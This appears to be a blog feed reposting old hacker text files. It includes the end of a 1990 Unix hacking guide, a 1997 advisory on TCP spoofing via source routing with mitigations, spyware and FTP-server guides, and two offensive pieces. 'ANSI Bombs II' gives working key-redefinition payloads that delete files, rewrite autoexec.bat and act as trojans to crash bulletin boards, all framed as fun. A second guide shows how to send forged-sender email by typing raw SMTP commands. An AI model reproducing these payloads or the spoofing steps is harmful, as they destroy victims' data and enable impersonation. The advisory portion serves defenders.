havoc, and at first they will think it is a bug.. I have seen this
happen ALL to many times, and it is always the same story...
The VAR is out for a fast buck, so they set up the software (all they know
how to do), and install any software packages ordered with it (following
the step by step instructions). Then they turn it over to the business
who runs a word processor, or database, or something, un aware that a
"shell" or command line exists, and they probably don't even know root does.
So, we will see more and more of these pop up, especially since AT&T is
now bundling a version of Xwindows with their new System V, and Simultask...
which will lead to even more holes. You'll find systems local to you
that are easy as hell to get into, and you'll see what I mean. These
VARs are really actually working for us. If a security problem arises
that the business is aware of, they call the VAR to fix it... Of course,
the Var gets paid by the hour, and leaves something open so you'll get in
again, and they make more moolahhhh.

You can use this phile for whatever you want. I can't stop you. Just
to learn unix (heh) or whatever. But its YOUR ass if you get caught.
Always consider the penalties before you attempt something. Sometimes
it is not worth it, Sometimes it is.

This phile was not meant to be comprehensive, even though it may seem like
it. I have left out a LOT of techniques, and quirks, specifically to get
you to learn SOMETHING on your own, and also to retain information so
I will have some secrets. You may pass this file on, UNMODIFIED, to any
GOOD H/P BBS. Sysops can add things to the archieve to say where
it was DL'd from, or to the text viewer for the same purpose. This is
Copywrited (haha) by Sir Hackalot, and by PHAZE, in the year 1990.

-Sir Hackalot of PHAZE
1990.

A simple TCP spoofing attack

noreply@blogger.com (Agung Prasetiawan,) — Thu, 22 Dec 2016 06:56:00 +0000

Over the past few years TCP sequence number prediction attacks have become a
real threat against unprotected networks, taking advantage of the inherent
trust relationships present in many network installations. TCP sequence
number prediction attacks have most commonly been implemented by opening a
series of connections to the target host, and attempting to predict the
sequence number which will be used next. Many operating systems have
therefore attempted to solve this problem by implementing a method of
generating sequence numbers in unpredictable fashions. This method does
not solve the problem.

This advisory introduces an alternative method of obtaining the initial
sequence number from some common trusted services. The attack presented here
does not require the attacker to open multiple connections, or flood a port
on the trusted host to complete the attack. The only requirement is that
source routed packets can be injected into the target network with fake
source addresses.

This advisory assumes that the reader already has an understanding of how
TCP sequence number prediction attacks are implemented.

The impact of this advisory is greatly diminished due to the large number of
organizations which block source routed packets and packets with addresses
inside of their networks. Therefore we present the information as more of
a 'heads up' message for the technically inclined, and to re-iterate that
the randomization of TCP sequence numbers is not an effective solution
against this attack.

Technical Details
~~~~~~~~~~~~~~~~~

The problem occurs when particular network daemons accept connections
with source routing enabled, and proceed to disable any source routing
options on the connection. The connection is allowed to continue, however
the reverse route is no longer used. An example attack can launched against
the in.rshd daemon, which on most systems will retrieve the socket options
via getsockopt() and then turn off any dangerous options via setsockopt().

An example attack follows.

Host A is the trusted host
Host B is the target host
Host C is the attacker

Host C initiates a source routed connection to in.rshd on host B, pretending
to be host A.

Host C spoofing Host A         <SYN>    --> Host B in.rshd

Host B receives the initial SYN packet, creates a new PCB (protocol
control block) and associates the route with the PCB. Host B responds,
using the reverse route, sending back a SYN/ACK with the sequence number.

Host C spoofing Host A <-- <SYN/ACK>       Host B in.rshd

Host C responds, still spoofing host A, acknowledging the sequence number.
Source routing options are not required on this packet.

Host C spoofing Host A         <ACK>    --> Host B in.rshd

We now have an established connection, the accept() call completes, and
control is now passed to the in.rshd daemon. The daemon now does IP
options checking and determines that we have initiated a source routed
connection. The daemon now turns off this option, and any packets sent
thereafter will be sent to the real host A, no longer using the reverse
route which we have specified. Normally this would be safe, however the
attacking host now knows what the next sequence number will be. Knowing
this sequence number, we can now send a spoofed packet without the source
routing options enabled, pretending to originate from Host A, and our
command will be executed.

In some conditions the flooding of a port on the real host A is required
if larger ammounts of data are sent, to prevent the real host A from
responding with an RST. This is not required in most cases when performing
this attack against in.rshd due to the small ammount of data transmitted.

It should be noted that the sequence number is obtained before accept()
has returned and that this cannot be prevented without turning off source
routing in the kernel.

As a side note, we're very lucky that TCP only associates a source route with
a PCB when the initial SYN is received. If it accepted and changed the ip
options at any point during a connection, more exotic attacks may be possible.
These could include hijacking connections across the internet without playing
a man in the middle attack and being able to bypass IP options checking
imposed by daemons using getsockopt(). Luckily *BSD based TCP/IP stacks will
not do this, however it would be interesting to examine other implementations.

Impact
~~~~~~

The impact of this attack is similar to the more complex TCP sequence
number prediction attack, yet it involves fewer steps, and does not require
us to 'guess' the sequence number. This allows an attacker to execute
arbitrary commands as root, depending on the configuration of the target
system. It is required that trust is present here, as an example, the use
of .rhosts or hosts.equiv files.

Solutions
~~~~~~~~~

The ideal solution to this problem is to have any services which rely on
IP based authentication drop the connection completely when initially
detecting that source routed options are present. Network administrators
and users can take precautions to prevent users outside of their network
from taking advantage of this problem. The solutions are hopefully already
either implemented or being implemented.

1. Block any source routed connections into your networks
2. Block any packets with internal based address from entering your network.

Network administrators should be aware that these attacks can easily be
launched from behind filtering routers and firewalls. Internet service
providers and corporations should ensure that internal users cannot launch
the described attacks. The precautions suggested above should be implemented
to protect internal networks.

Example code to correctly process source routed packets is presented here
as an example. Please let us know if there are any problems with it.
This code has been tested on BSD based operating systems.

        u_char optbuf[BUFSIZ/3];
        int optsize = sizeof(optbuf), ipproto, i;
        struct protoent *ip;

        if ((ip = getprotobyname("ip")) != NULL)
                ipproto = ip->p_proto;
        else
                ipproto = IPPROTO_IP;
        if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) &&
            optsize != 0) {
                for (i = 0; i < optsize; ) {
                        u_char c = optbuf[i];
                        if (c == IPOPT_LSRR || c == IPOPT_SSRR)
                                exit(1);
                        if (c == IPOPT_EOL)
                                break;
                        i += (c == IPOPT_NOP) ? 1 : optbuf[i+1];
                }
        }

One critical concern is in the case where TCP wrappers are being used. If
a user is relying on TCP wrappers, the above fix should be incorporated into
fix_options.c. The problem being that TCP wrappers itself does not close
the connection, however removes the options via setsockopt(). In this case
when control is passed to in.rshd, it will never see any options present,
and the connection will remain open (even if in.rshd has the above patch
incorporated). An option to completely drop source routed connections will
hopefully be provided in the next release of TCP wrappers. The other option
is to undefine KILL_IP_OPTIONS, which appears to be undefined by default.
This passes through IP options and allows the called daemon to handle them
accordingly.

Disabling Source Routing
~~~~~~~~~~~~~~~~~~~~~~~~

We believe the following information to be accurate, however it is not
guaranteed.

--- Cisco

To have the router discard any datagram containing an IP source route option
issue the following command:

no ip source-route

This is a global configuration option.

--- NetBSD

Versions of NetBSD prior to 1.2 did not provide the capability for disabling
source routing. Other versions ship with source routing ENABLED by default.
We do not know of a way to prevent NetBSD from accepting source routed packets.
NetBSD systems, however, can be configured to prevent the forwarding of packets
when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0

--- BSD/OS

BSDI has made a patch availible for rshd, rlogind, tcpd and nfsd. This
patch is availible at:

ftp://ftp.bsdi.com/bsdi/patches/patches-2.1

OR via their patches email server <patches@bsdi.com>

The patch number is
U210-037 (normal version)
D210-037 (domestic version for sites running kerberized version)

BSD/OS 2.1 has source routing disabled by default

Previous versions ship with source routing ENABLED by default. As far as
we know, BSD/OS cannot be configured to drop source routed packets destined
for itself, however can be configured to prevent the forwarding of such
packets when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0

--- OpenBSD

Ships with source routing turned off by default. To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

This will prevent OpenBSD from forwarding and accepting any source routed
packets.

--- FreeBSD

Ships with source routing turned off by default. To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

--- Linux

Linux by default has source routing disabled in the kernel.

--- Solaris 2.x

Ships with source routing enabled by default. Solaris 2.5.1 is one of the
few commercial operating systems that does have unpredictable sequence
numbers, which does not help in this attack.

We know of no method to prevent Solaris from accepting source routed
connections, however, Solaris systems acting as gateways can be prevented
from forwarding any source routed packets via the following commands:

# ndd -set /dev/ip ip_forward_src_routed 0

You can prevent forwarding of all packets via:

# ndd -set /dev/ip ip_forwarding 0

These commands can be added to /etc/rc2.d/S69inet to take effect at bootup.

--- SunOS 4.x

We know of no method to prevent SunOS from accepting source routed
connections, however a patch is availible to prevent SunOS systems from
forwarding source routed packets.

This patch is availible at:

ftp://ftp.secnet.com/pub/patches/source-routing-patch.tar.gz

To configure SunOS to prevent forwarding of all packets, the following
command can be issued:

# echo "ip_forwarding/w 0" | adb -k -w /vmunix /dev/mem
# echo "ip_forwarding?w 0" | adb -k -w /vmunix /dev/mem

The first command turns off packet forwarding in /dev/mem, the second in
/vmunix.

--- HP-UX

HP-UX does not appear to have options for configuring an HP-UX system to
prevent accepting or forwarding of source routed packets. HP-UX has IP
forwarding turned on by default and should be turned off if acting as a
firewall. To determine whether IP forwarding is currently on, the following
command can be issued:

# adb /hp-ux
ipforwarding?X      <- user input
ipforwarding:
ipforwarding: 1
#

A response of 1 indicates IP forwarding is ON, 0 indicates off. HP-UX can
be configured to prevent the forwarding of any packets via the following
commands:

# adb -w /hp-ux /dev/kmem
ipforwarding/W 0
ipforwarding?W 0
^D
#

--- AIX

AIX cannot be configured to discard source routed packets destined for itself,
however can be configured to prevent the forwarding of source routed packets.
IP forwarding and forwarding of source routed packets specifically can be
turned off under AIX via the following commands:

To turn off forwarding of all packets:

# /usr/sbin/no -o ipforwarding=0

To turn off forwarding of source routed packets:

# /usr/sbin/no -o nonlocsrcroute=0

Note that these commands should be added to /etc/rc.net

If shutting off source routing is not possible and you are still using
services which rely on IP address authentication, they should be disabled
immediately (in.rshd, in.rlogind). in.rlogind is safe if .rhosts and
/etc/hosts.equiv are not used.

Attributions
~~~~~~~~~~~~

Thanks to Niels Provos <provos@physnet.uni-hamburg.de> for providing
the information and details of this attack. You can view his web
site at http://www.physnet.uni-hamburg.de/provos

Thanks to Theo de Raadt, the maintainer of OpenBSD for forwarding this
information to us. More information on OpenBSD can be found at
http://www.openbsd.org

Thanks to Keith Bostic <bostic@bsdi.com> for discussion and a quick
solution for BSD/OS.

Thanks to Brad Powell <brad.powell@west.sun.com> for providing information
for Solaris 2.x and SunOS 4.x operating systems.

Thanks go to CERT and AUSCERT for recommendations in this advisory.

You can contact the author of this advisory at oliver@secnet.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAzJATn0AAAEEAJeGbZyoCw14fCoAMeBRKiZ3L6JMbd9f4BtwdtYTwD42/Uz1
A/4UiRJzRLGhARpt1J06NVQEKXQDbejxGIGzAGTcyqUCKH6yNAncqoep3+PKIQJd
Kd23buvbk7yUgyVlqQHDDsW0zMKdlSO7rYByT6zsW0Rv5JmHJh/bLKAOe7p9AAUR
tCVPbGl2ZXIgRnJpZWRyaWNocyA8b2xpdmVyQHNlY25ldC5jb20+iQCVAwUQMkBO
fR/bLKAOe7p9AQEBOAQAkTXiBzf4a31cYYDFmiLWgXq0amQ2lsamdrQohIMEDXe8
45SoGwBzXHVh+gnXCQF2zLxaucKLG3SXPIg+nJWhFczX2Fo97HqdtFmx0Y5IyMgU
qRgK/j8KyJRdVliM1IkX8rf3Bn+ha3xn0yrWlTZMF9nL7iVPBsmgyMOuXwZ7ZB8=
=xq4f
-----END PGP PUBLIC KEY BLOCK-----

Copyright Notice
~~~~~~~~~~~~~~~~
The contents of this advisory are Copyright (C) 1997 Secure Networks Inc,
and may be distributed freely provided that no fee is charged for
distribution, and that proper credit is given.

You can find Secure Networks papers at ftp://ftp.secnet.com/pub/papers
and advisories at ftp://ftp.secnet.com/advisories

You can browse our web site at http://www.secnet.com

You can subscribe to our security advisory mailing list by sending mail to
majordomo@secnet.com with the line "subscribe sni-advisories"

ANSI Bombs II: Tips and Techniques

noreply@blogger.com (Agung Prasetiawan,) — Wed, 21 Dec 2016 06:54:00 +0000

ANSI Bombs II: Tips and Techniques - The Raging Golem

I. Introduction

    After writing the last file, a lot of people let me know about the
mistakes I had made. I guess this file is to clear up those miscon
ceptions and to let people know about some of the little tricks behind
ANSI bombing. Of course, ANSI bombing isn't as dangerous as a lot of
people make it out to be, but bombs are still fun to make and with a
little planning deliver some degree of success. ANSI bombing can
be dangerous, so I am tired of hearing people say that an ANSI bomb is
harmless, another misconception I hope to clear up. Now, most people
that have spent time experimenting with ANSI bombs probably know most
of the material in this file, but it might be fun just to read anyway.

    2. Misconceptions

    In my last file, I made three major blunders, or what I would con
sider to be major blunders. First, I said that ANSI bombs could be
used on BBSs to screw people over, but I guess I was wrong. It was
pure speculation on what other people had said that made me say that.
ANSI codes, including those that redefine keys, are sent over the
lines, but most comm programs don't use ANSI.SYS; they use their own
version of ANSI, which doesn't support key redefinition. Some people
might have a program that supports it, but I haven't seen it yet. I
have tested bombs on systems on my own and proved to myself that they
don't work. I have also seen people fuck up bombs that would have
worked by uploading them in a message. The second misconception is
that ANSI bombs are dangerous when put into zips. I haven't really
tested this out much, but from what I hear with the newer versions of
PKZIP, you have to specify that you want to see ANSI comments when
unzipping. It is unlikely that you would waste your time unzipping
something again after seeing "Format C:" in the middle of an escape
code. I could be mistaken, but I'm pretty sure that I'm right. Third,
the last thing that was a misconception is that VANSI.SYS will protect
your system from key redefinition. Maybe the newer versions don't
support key redefinition, but mine sure as hell does. There are pro
grams out there that don't support it, but I don't know any of the
names. Of course, if I were you, I would be wary about using some
thing other then ANSI. I have a few friends that are working on "A
Better ANSI" for PDers, which, instead of being better, really screws
them over.

    3. An Overview

    Now, in case you haven't read my other file (it's called ANSI.DOC,
kind of lame but fairly informative), I'll briefly go over the struc
ture of an ANSI bomb. Skip this part if you know what an ANSI bomb is
and how to make one.
    In ANSI everything is done with a system of escape codes. Key
redefinition is one of those codes. (From now, whenever I say ESC, I
really mean the arrow, ). Here is a basic command:
                          ESC [13;27p
    This would make the <Enter> key (13 is the code for enter) turn
into the <Escape> key (27 is the code for escape). The always has to
be there, as do the bracket and the "p", but what is between the
bracket and the "p" is up to you. The first number is always the key
that you want to be redefined. If there is a zero for the first num
ber, that means the key is in the extended set, and therefore, the
first two numbers are the code. The bracket signifies the beginning
of the definition, and the "p" signifies the end. Whenever you want a
key pressed, you have to use it's numerical code (i.e. 13 is the code
for <Enter>). You can't redefine strings, but you can redefine a key
to become a string (i.e. ESC [13;"Blah"p would make <Enter> say
"Blah"). Strings must be inside of quotes, which includes commands
that you want typed on the DOS prompt (i.e. ESC [13;"Del *.*";13p
would delete everything in the directory, note that 13 stands for
Enter in this case, not the redefinition). An escape code can have
as many commands as you want in it, but each one has to be separated
by a semi-colon. You can only redefine one key in each escape code,
so if you want to redefine another key, you have to start another
escape code. That's about it when it comes to bombs, now that you
have the basics, all you really need is a little imagination.

    4. Tips and Tricks

    A. The Y/N Redefinition

    Now, here's a simple but fun little ANSI bomb:

                   ESC [78;89;13p ESC [110;121;13p

    Basically, all this does is turn a capital "N" into "Y" and a
lower-case "n" into "y". Alone this doesn't do too much, except for
screw around with what they are typing. On the other hand, try adding
this line of code to the ANSI bomb:

                   ESC [13;27;13;"del *.*";13p

    Most people would automatically press "N" when they see "Del *.*",
but when they do, they will be screwed over. This portion of a bomb
is very useful when it comes to making good bombs.

    B. Screwing with the Autoexec.bat

    Here is another line of code that you may find useful in future
bombing projects:

                   ESC [13;27;13;"copy bomb.ans c:\";13;"copy con
                     c:\autoexec.bat";13;"type bomb.ans";13;0;109;
                     13;"cls";13p

    This line of code makes the bomb a little more permanent and a
little more dangerous. It copies the bomb into the root directory,
then it change/creates the autoexec.bat, so the bomb is typed after
every boot-up. Of course, the person could just boot off a disk, but
I'm sure this would get them a few time. It could also probably
appear as though it were a virus, scaring the shit out of the owner of
the computer.

    C. Turning Commands into Other Commands

    One of the best pranks to do to someone using an ANSI bomb is to
redefine commands. That way if they type in "copy", it will turn into
"Del *.*". Since you can't actually change the whole string, you have
to take a different approach. You have to change a few of the keys,
so when typed, they type and execute the desired command. I guess it
would be coolest to have to command exactly the same length; that way
you could redefine one key at a time to obtain the desired effect.
It doesn't really matter how you do it, just as long as it works. You
might make an ANSI that says "Wow, check out what this bomb did to
your directory", and then have it redefine the keys, so when they type
in "dir", it turns into "del". I think you get the idea.

    D. Trojans

    By now, everybody knows what a Trojan is. You probably wouldn't
think so, but ANSI bombs can be used as Trojans and in Trojans. First,
if you are planning on crashing a board, but you're not very good at
programming, then make yourself an ANSI bomb. Try to find out in
which directory the main files for running the BBS are stored. They
are usually under the name BBS or the name of the software, like WWIV
or Telegard. Then, make a bomb that either just deletes all the files
in that directory, or if you want the board to be down a longer time,
then make one that formats the Hard Drive. In this form ANSI bombs,
if they are well planned out, can be easy to make Trojans. Second,
ANSI bombs can used in Trojans. This is probably stretching it a
little, but say you wanted to write a Trojan that would delete a
directory, every time you typed a certain key, then you could use an
ANSI bomb. First make some batch and com/exe files that would search
for protecting programs like Norton and turn them off. Then you could
copy the file into the root directory, along with your versions of
autoexec.bat, config.sys, ANSI.sys, and whatever else. (To make it
look more realistic make the files Resource.00x to trick the user,
then when copying, use the real name). Then somehow lock the computer
up or do a warm boot through some pd program, which is easily attain
able. When the computer loads back up, you can screw that shit out of
them with your ANSI bomb.

    5. Conclusion
    It would seem to some people that ANSI bombs are very dangerous,
and to others that they are stupid or lame. Personally, I think that
ANSI bombs are just plain old fun. They're not too hard to make, but
there is a lot that you can do with them. They are nowhere near as
malicious as virii, so if you're looking for unstoppable destruction,
look elsewhere, but they do serve their purpose. I know that there
are programs out there that help you program ANSI bombs, but I think
that they kind of take the fun out of them. Probably, some day soon,
I'll quit making ANSI bombs and start looking more into virii and pure
Trojans. But for now, ANSI bombs suit my purpose.

                               -TRG

    Appendix A: Key Code Program

    Here is a small program, which I find very helpful. After loading
it up, it tells you the numeric code for every key you type in. Spe
cial means that it is in the extended set and therefore uses zero, and
"q" ends the program. Unfortunately, I can't take any credit for
this program. I got it over the phone from Heavymetl, and it was made
by his brother. So many thanks go out to Heavymetl and his brother,
even though they'll probably be a little pissed at me for including
this in my file. It is in Pascal and can be compiled in most Turbo
Pascal compilers.

    Use CRT;
    Var
      CH : CHAR;
    Begin
      Repeat
        CH := ReadKey;
        If CH = #0 then
          Begin
            CH := ReadKey;
            WriteLn(CH,'(Special) - ',ORD(CH));
          End
        Else
          WriteLn(CH,' - ',ORD(CH));
      Until
        CH = 'q';
    End.

    Thanks go out to:

    Heavymetl and his brother for the program and ideas. Weapons
Master for the input and the help he has given me. Everybody else who
has helped me out; you know who you are, or at least, you think you
know who you are. Most of all, to those brave soldiers risking their
asses everyday for us half-way across the world in Saudi Arabia. Your
deeds haven't gone unnoticed, of course that's mainly because that's
all the news ever shows nowadays. Also, to anybody else I might have

ANONYMOUS emails

noreply@blogger.com (Agung Prasetiawan,) — Tue, 20 Dec 2016 06:52:00 +0000

Welcome to Hackerdevil's guide on how to send ANONYMOUS e-mails to someone without a prog.

I am Hackerdevil and i am going to explain ya a way to send home-made e-mails. I mean its a way to send Annonimous e-mails without a program, it doesn't take
to much time and its cool and you can have more knowledge than with a stupid program that does all by itself.

This way (to hackers) is old what as you are newby to this stuff, perhaps you may like to know how these anonymailers work, (home-made)

Well.....
Go to Start, then Run...
You have to Telnet (Xserver) on port 25

Well, (In this Xserver) you have to put the name of a server without the ( ) of course...
Put in iname.com in (Xserver) because it always work it is a server with many bugs in it.
(25) mail port.

So now we are like this.

telnet iname.com 25

and then you hit enter
Then When you have telnet open put the following like it is written

helo

and the machine will reply with smth.

Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all opctions available and in the emulation menu that's the following one you have to tick the second option.
Now you will se what you are writing.

then you put:

mail from:<whoeveryouwant@whetheveryouwant.whetever.whatever> and so on...
If you make an error start all over again

Example:
mail from:<askbill@microsoft.com.net>

You hit enter and then you put:

rcpt to:<lamer@lamer'sworld.com>
This one has to be an existance address as you are mailing anonymously to him.

Then you hit enter
And you type
Data
and hit enter once more

Then you write

Subject:whetever

And you hit enter

you write your mail

hit enter again (boring)

you put a simple:
.

Yes you don't see it its the little fucking point!
and hit enter
Finally you write
quit
hit enter one more time
and it's done

look:Try first do it with yourself I mean mail annonymously yourself so you can test it!
Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer!

Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....

Disclamer:Hackerdevil is not responsable for whetever you do with this info. you can destribute this but you are totally forbidden to take out the "By Hackerdevil" line. You can't modify or customize this text and i am also not responsable if you send an e-mail to an important guy and insult him, and i rectly advise you that this is for educational porpouses only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you. If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com" insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you.

By Hackerdevil

hackerdevil@iname.com
www.angelfire.com/ar/HDanzi/index.html

All about spyware

noreply@blogger.com (Agung Prasetiawan,) — Mon, 19 Dec 2016 06:49:00 +0000

There are a lot of PC users that know little about "Spyware", "Mal-ware", "hijackers", "Dialers" & many more. This will help you avoid pop-ups, spammers and all those baddies.

What is spy-ware?
Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer them to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee.

Known spywares
There are thousands out there, new ones are added to the list everyday. But here are a few:
Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

How to check if a program has spyware?
The is this Little site that keeps a database of programs that are known to install spyware.

Check Here: http://www.spywareguide.com/product_search.php

If you would like to block pop-ups (IE Pop-ups).
There tons of different types out there, but these are the 2 best, i think.

Try: Google Toolbar (http://toolbar.google.com/) This program is Free
Try: AdMuncher (http://www.admuncher.com) This program is Shareware

If you want to remove the "spyware" try these.
Try: Lavasoft Ad-Aware (http://www.lavasoftusa.com/) This program is Free
Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.

Try: Spybot-S&D (http://www.safer-networking.org/) This program is Free
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.

Try: BPS Spyware and Adware Remover (http://www.bulletproofsoft.com/spyware-remover.html) This program is Shareware
Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you'd like to remove.

Try: Spy Sweeper v2.2 (http://www.webroot.com/wb/products/spysweeper/index.php) This program is Shareware
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.
The best scanner out there, and updated all the time.

Try: HijackThis 1.97.7 (http://www.spywareinfo.com/~merijn/downloads.html) This program is Freeware
Info: HijackThis is a tool, that lists all installed browser add-on, buttons, startup items and allows you to inspect them, and optionally remove selected items.

If you would like to prevent "spyware" being install.
Try: SpywareBlaster 2.6.1 (http://www.wilderssecurity.net/spywareblaster.html) This program is Free
Info: SpywareBlaster doesn`t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.

Try: SpywareGuard 2.2 (http://www.wilderssecurity.net/spywareguard.html) This program is Free
Info: SpywareGuard provides a real-time protection solution against so-called spyware. It works similar to an anti-virus program, by scanning EXE and CAB files on access and alerting you if known spyware is detected.

Try: XP-AntiSpy (http://www.xp-antispy.org/) This program is Free
Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people.

Try: SpySites (http://camtech2000.net/Pages/SpySites_Prog...ml#SpySitesFree) This program is Free
Info: SpySites allows you to manage the Internet Explorer Restricted Zone settings and easily add entries from a database of 1500+ sites that are known to use advertising tracking methods or attempt to install third party software.

If you would like more Information about "spyware".
Check these sites.
http://www.spychecker.com/
http://www.spywareguide.com/
http://www.cexx.org/adware.htm
http://www.theinfomaniac.net/infomaniac/co...rsSpyware.shtml
http://www.thiefware.com/links/
http://simplythebest.net/info/spyware.html

Usefull tools...
Try: Stop Windows Messenger Spam 1.10 (http://www.jester2k.pwp.blueyonder.co.uk/j...r2ksoftware.htm) This program is Free
Info: "Stop Windows Messenger Spam" stops this Service from running and halts the spammers ability to send you these messages.

----------------------------------------------------------------------------
All these softwares will help remove and prevent evil spammers and spywares attacking your PC. I myself recommend getting "spyblaster" "s&d spybot" "spy sweeper" & "admuncher" to protect your PC. A weekly scan is also recommended

Free Virus Scan
Scan for spyware, malware and keyloggers in addition to viruses, worms and trojans. New threats and annoyances are created faster than any individual can keep up with.
http://defender.veloz.com// - 15k

Finding . is a Click Away at 2020Search.com
Having trouble finding what you re looking for on: .? 2020Search will instantly provide you with the result you re looking for by drawing on some of the best search engines the Internet has to offer. Your result is a click away!
http://www.2020search.com// - 43k

Download the BrowserVillage Toolbar.
Customize your Browser! Eliminate Pop-up ads before they start, Quick and easy access to the Web, and much more. Click Here to Install Now!
http://www.browservillage.com/ - 36k

All About FTP, must read.

noreply@blogger.com (Agung Prasetiawan,) — Sun, 18 Dec 2016 06:47:00 +0000

Well, since many of us have always wondered this, here it is. Long and drawn out. Also, before attempting this, realize one thing; You will have to give up your time, effort, bandwidth, and security to have a quality ftp server.
That being said, here it goes. First of all, find out if your IP (Internet Protocol) is static (not changing) or dynamic (changes everytime you log on). To do this, first consider the fact if you have a dial up modem. If you do, chances are about 999 999 out of 1 000 000 that your IP is dynamic. To make it static, just go to a place like h*tp://www.myftp.org/ to register for a static ip address.

You'll then need to get your IP. This can be done by doing this:
Going to Start -> Run -> winipcfg or www.ask.com and asking 'What is my IP?'

After doing so, you'll need to download an FTP server client. Personally, I'd recommend G6 FTP Server, Serv-U FTPor Bullitproof v2.15 all three of which are extremely reliable, and the norm of the ftp world.
You can download them on this site: h*tp://www.liaokai.com/softw_en/d_index.htm

First, you'll have to set up your ftp. For this guide, I will use step-by-step instructions for G6. First, you'll have to go into 'Setup -> General'. From here, type in your port # (default is 21). I recommend something unique, or something a bit larger (ex: 3069). If you want to, check the number of max users (this sets the amount of simultaneous maximum users on your server at once performing actions - The more on at once, the slower the connection and vice versa).

The below options are then chooseable:
-Launch with windows
-Activate FTP Server on Start-up
-Put into tray on startup
-Allow multiple instances
-Show "Loading..." status at startup
-Scan drive(s) at startup
-Confirm exit

You can do what you want with these, as they are pretty self explanatory. The scan drive feature is nice, as is the 2nd and the last option. From here, click the 'options' text on the left column.

To protect your server, you should check 'login check' and 'password check', 'Show relative path (a must!)', and any other options you feel you'll need. After doing so, click the 'advanced' text in the left column. You should then leave the buffer size on the default (unless of course you know what you're doing ), and then allow the type of ftp you want.

Uploading and downloading is usually good, but it's up to you if you want to allow uploads and/or downloads. For the server priority, that will determine how much conventional memory will be used and how much 'effort' will go into making your server run smoothly.

Anti-hammering is also good, as it prevents people from slowing down your speed. From here, click 'Log Options' from the left column. If you would like to see and record every single command and clutter up your screen, leave the defaults.

But, if you would like to see what is going on with the lowest possible space taken, click 'Screen' in the top column. You should then check off 'Log successful logins', and all of the options in the client directry, except 'Log directory changes'. After doing so, click 'Ok' in the bottom left corner.

You will then have to go into 'Setup -> User Accounts' (or ctrl & u). From here, you should click on the right most column, and right click. Choose 'Add', and choose the username(s) you would like people to have access to.

After giving a name (ex: themoonlanding), you will have to give them a set password in the bottom column (ex: wasfaked). For the 'Home IP' directory, (if you registered with a static server, check 'All IP Homes'. If your IP is static by default, choose your IP from the list. You will then have to right click in the very center column, and choose 'Add'.

From here, you will have to set the directory you want the people to have access to. After choosing the directory, I suggest you choose the options 'Read', 'List', and 'Subdirs', unless of course you know what you're doing . After doing so, make an 'upload' folder in the directory, and choose to 'add' this folder seperately to the center column. Choose 'write', 'append', 'make', 'list', and 'subdirs'. This will allow them to upload only to specific folders (your upload folder).

Now click on 'Miscellaneous' from the left column. Choose 'enable account', your time-out (how long it takes for people to remain idle before you automatically kick them off), the maximum number of users for this name, the maximum number of connections allowed simultaneously for one ip address, show relative path (a must!), and any other things at the bottom you'd like to have. Now click 'Ok'.
**Requested**

From this main menu, click the little boxing glove icon in the top corner, and right click and unchoose the hit-o-meter for both uploads and downloads (with this you can monitor IP activity). Now click the lightning bolt, and your server is now up and running.

Post your ftp info, like this:

213.10.93.141 (or something else, such as: 'f*p://example.getmyip.com')

User: *** (The username of the client)

Pass: *** (The password)

Port: *** (The port number you chose)

So make a FTP and join the FTP section

Listing The Contents Of A Ftp:

Listing the content of a FTP is very simple.
You will need FTP Content Maker, which can be downloaded from here:
